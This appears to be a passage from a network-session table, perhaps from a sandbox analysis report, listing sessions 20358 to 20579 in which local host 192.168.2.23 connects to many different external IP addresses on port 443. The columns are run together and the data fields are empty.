                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20358192.168.2.235211447.62.15.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20359192.168.2.2333984139.73.209.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20360192.168.2.2346888160.27.124.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20361192.168.2.234816234.101.69.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20362192.168.2.2340842137.78.247.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20363192.168.2.2349124134.209.104.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20364192.168.2.233993854.61.63.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20365192.168.2.235290451.35.221.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20366192.168.2.234233835.41.154.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20367192.168.2.2352054122.226.21.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20368192.168.2.235304817.33.131.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20369192.168.2.23608125.53.226.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20370192.168.2.233366275.165.23.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20371192.168.2.2337270142.14.42.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20372192.168.2.233879239.158.164.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20373192.168.2.234582294.54.164.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20374192.168.2.2345656187.241.32.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20375192.168.2.2336874134.142.169.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20376192.168.2.2339484104.160.210.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20377192.168.2.233988291.67.203.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20378192.168.2.2355482153.176.92.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20379192.168.2.234844640.238.71.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20380192.168.2.233829681.241.179.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20381192.168.2.2336950177.147.83.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20382192.168.2.2356032199.174.115.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20383192.168.2.234089817.109.173.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20384192.168.2.234871440.220.52.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20385192.168.2.23544684.131.35.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20386192.168.2.2353194196.16.54.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20387192.168.2.2340022141.109.156.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20388192.168.2.235704293.107.94.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20389192.168.2.235947224.123.186.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20390192.168.2.2343028124.27.202.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20391192.168.2.235310441.236.48.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20392192.168.2.235904474.231.15.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20393192.168.2.235952825.87.167.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20394192.168.2.234894654.50.49.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20395192.168.2.2346734149.24.255.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20396192.168.2.233862245.18.10.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20397192.168.2.235327024.179.183.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20398192.168.2.2339992207.177.92.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20399192.168.2.2352522134.79.249.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20400192.168.2.2350540160.147.76.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20401192.168.2.2349530123.145.246.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20402192.168.2.2352716206.139.89.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20403192.168.2.2349696187.10.150.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20404192.168.2.235539469.109.233.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20405192.168.2.2355254156.112.202.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20406192.168.2.234173234.197.181.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20407192.168.2.2351612117.118.244.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20408192.168.2.2345108167.230.197.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20409192.168.2.236069497.225.227.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20410192.168.2.2354810151.164.229.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20411192.168.2.2333962148.199.191.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20412192.168.2.2345480202.226.211.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20413192.168.2.2353458197.65.255.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20414192.168.2.234798267.137.72.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20415192.168.2.2348922100.234.7.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20416192.168.2.2334520177.128.92.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20417192.168.2.2357360138.94.184.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20418192.168.2.233629284.204.133.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20419192.168.2.2343450115.190.31.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20420192.168.2.2357852190.84.132.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20421192.168.2.2346882111.84.134.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20422192.168.2.234073624.155.218.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20423192.168.2.2343470200.73.214.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20424192.168.2.2336776138.79.145.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20425192.168.2.2340996200.140.227.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20426192.168.2.23426549.74.125.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20427192.168.2.2359970169.49.251.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20428192.168.2.2346396118.5.145.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20429192.168.2.235428838.232.241.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20430192.168.2.234684059.28.183.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20431192.168.2.2342706159.224.83.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20432192.168.2.2333400185.202.59.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20433192.168.2.233829820.124.99.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20434192.168.2.234580666.207.126.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20435192.168.2.235850097.22.159.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20436192.168.2.2344126153.102.208.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20437192.168.2.2359286167.55.112.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20438192.168.2.2343016221.22.28.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20439192.168.2.234376213.18.239.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20440192.168.2.2359552116.186.234.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20441192.168.2.234574062.80.91.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20442192.168.2.2340790116.23.218.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20443192.168.2.2360216221.119.99.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20444192.168.2.2347864189.130.95.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20445192.168.2.2344104125.99.198.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20446192.168.2.235654044.36.239.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20447192.168.2.2336762161.117.245.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20448192.168.2.2337136165.215.90.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20449192.168.2.2332898211.90.42.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20450192.168.2.2347068156.214.167.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20451192.168.2.2334802223.206.119.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20452192.168.2.2339842117.120.47.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20453192.168.2.2343690103.75.156.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20454192.168.2.2350754189.74.197.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20455192.168.2.234127476.138.204.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20456192.168.2.233661443.217.189.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20457192.168.2.235051636.86.13.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20458192.168.2.23374522.212.4.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20459192.168.2.2346698213.70.109.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20460192.168.2.234578846.107.14.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20461192.168.2.233884848.131.21.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20462192.168.2.2353782194.159.90.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20463192.168.2.23332508.230.60.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20464192.168.2.2350426176.21.13.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20465192.168.2.2357294193.85.21.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20466192.168.2.2357104154.138.174.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20467192.168.2.2346952162.109.69.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20468192.168.2.2356334109.254.200.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20469192.168.2.235321495.242.137.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20470192.168.2.234434273.247.162.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20471192.168.2.233751872.217.193.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20472192.168.2.2347442121.107.105.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20473192.168.2.2355244123.141.222.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20474192.168.2.235036432.66.219.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20475192.168.2.234030212.171.15.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20476192.168.2.234124492.239.127.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20477192.168.2.234262619.124.132.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20478192.168.2.2346020218.7.138.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20479192.168.2.2345496137.70.48.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20480192.168.2.2344322193.31.214.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20481192.168.2.235955668.118.76.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20482192.168.2.2350156150.210.158.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20483192.168.2.235665059.212.109.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20484192.168.2.23428668.139.32.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20485192.168.2.2350924208.100.82.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20486192.168.2.235117696.171.187.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20487192.168.2.2345980191.8.234.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20488192.168.2.233549864.43.45.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20489192.168.2.23530902.171.105.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20490192.168.2.2354376117.201.244.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20491192.168.2.234669267.53.215.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20492192.168.2.2332860191.69.58.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20493192.168.2.233549649.157.37.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20494192.168.2.233990053.189.130.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20495192.168.2.2335556170.245.223.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20496192.168.2.234519048.186.225.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20497192.168.2.234643275.50.235.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20498192.168.2.234796276.52.81.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20499192.168.2.2360488131.148.25.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20500192.168.2.2351722122.230.38.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20501192.168.2.2355128171.63.145.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20502192.168.2.2352774126.226.51.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20503192.168.2.2335606209.133.164.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20504192.168.2.2356184153.57.1.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20505192.168.2.234204436.211.20.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20506192.168.2.234524473.52.162.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20507192.168.2.2357774189.169.126.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20508192.168.2.2335026126.29.3.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20509192.168.2.233877088.178.1.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20510192.168.2.2359320144.35.219.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20511192.168.2.2353112119.215.137.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20512192.168.2.2355324206.109.163.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20513192.168.2.2350836156.22.138.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20514192.168.2.2334610111.9.26.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20515192.168.2.233531635.142.82.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20516192.168.2.235939463.15.6.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20517192.168.2.2360440181.58.53.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20518192.168.2.2337464103.65.99.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20519192.168.2.2347866130.91.212.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20520192.168.2.235936427.118.20.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20521192.168.2.2348662216.131.7.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20522192.168.2.2357900166.176.160.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20523192.168.2.2358086182.224.158.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20524192.168.2.2353046125.162.163.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20525192.168.2.233915446.97.17.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20526192.168.2.235287654.228.199.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20527192.168.2.234923066.88.206.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20528192.168.2.2351224194.251.17.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20529192.168.2.235612424.7.12.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20530192.168.2.235290675.173.97.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20531192.168.2.2355846221.147.25.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20532192.168.2.234040293.77.222.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20533192.168.2.2353400121.236.66.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20534192.168.2.2354602149.177.120.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20535192.168.2.2340128185.3.9.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20536192.168.2.2347310194.198.12.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20537192.168.2.2344966193.134.241.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20538192.168.2.233769627.199.162.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20539192.168.2.2359572211.39.222.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20540192.168.2.2333480180.72.82.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20541192.168.2.2337104105.46.124.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20542192.168.2.2358060205.164.8.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20543192.168.2.2342576197.190.69.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20544192.168.2.2354316148.118.203.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20545192.168.2.2349938222.139.73.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20546192.168.2.2348494148.229.159.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20547192.168.2.2352736204.24.208.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20548192.168.2.2356414123.221.7.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20549192.168.2.2360052138.68.246.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20550192.168.2.2349804213.12.121.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20551192.168.2.2351092207.102.222.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20552192.168.2.235156280.175.129.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20553192.168.2.2343656122.221.54.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20554192.168.2.23533965.193.100.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20555192.168.2.2357756158.22.30.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20556192.168.2.233483039.13.168.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20557192.168.2.2353392110.69.241.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20558192.168.2.2360802150.31.106.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20559192.168.2.233323836.199.12.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20560192.168.2.2358870192.128.184.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20561192.168.2.2350670147.136.171.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20562192.168.2.234909845.22.243.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20563192.168.2.234824051.197.254.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20564192.168.2.2345114192.85.166.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20565192.168.2.2341468201.84.52.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20566192.168.2.2335684198.112.250.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20567192.168.2.2357340168.77.51.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20568192.168.2.234175037.189.160.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20569192.168.2.2342374212.79.44.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20570192.168.2.2341932105.100.208.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20571192.168.2.2350930195.183.55.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20572192.168.2.2337756176.42.198.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20573192.168.2.2360290172.171.78.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20574192.168.2.2350958161.33.249.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20575192.168.2.2352872104.84.252.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20576192.168.2.2340432143.136.189.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20577192.168.2.2333812177.161.69.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20578192.168.2.2346678128.224.133.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20579192.168.2.233744652.55.13.174443
